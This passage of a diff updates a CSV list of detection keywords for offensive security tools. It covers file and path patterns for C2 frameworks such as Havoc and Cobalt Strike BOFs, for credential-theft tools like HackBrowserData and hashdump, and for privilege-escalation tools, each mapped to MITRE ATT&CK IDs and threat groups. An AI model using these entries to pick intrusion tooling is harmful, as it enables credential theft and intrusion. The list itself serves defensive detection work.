- T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/GruntHTTP.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/gtfobins.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/gtfobins.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" -"*/guervild/BOFs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/guervild/BOFs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/guessed_emails.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "*/gyaansastra/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" -"*/GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*/GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*/h8mail/*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" -"*/HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*/HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" "*/hackerid.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*/hackingtool.git*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" -"*/Hack-Tools.git*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*/hackingtool.git*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*/Hack-Tools.git*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" "*/Hades.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*/hades.git*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/HadesLdr.git*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" @@ -3743,24 +3760,26 @@ "*/hadoop-secondary-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-tasktracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Hak5.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*/hakrawler.git*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*/hakrawler.git*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" "*/hancitor.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/handlekatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/HandleKatz_BOF*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","93","17","2021-10-12T21:38:02Z","2021-10-12T18:45:06Z" "*/HarmJ0y*","offensive_tool_keyword","Github Username","Co-founder of Empire. BloodHound. and the Veil-Framework | PowerSploit developer | krb lover | Microsoft PowerShell MVP | Security at the misfortune of others","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/HarmJ0y","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/HaryyUser.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*/hashcat*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/HaryyUser.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/hash_spider.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/hashcat*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/hashdump_dc*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Hashi0x/*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","","N/A","","","" -"*/hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*/hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" "*/havex.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*/Havoc.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Havoc.qss*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Havoc.rc*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Havoc/data/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Havoc/main/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/HavocFramework/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/HavocImages/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/havoc-py/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/Havoc.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc.qss*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc.rc*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc/data/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc/main/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/HavocFramework/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 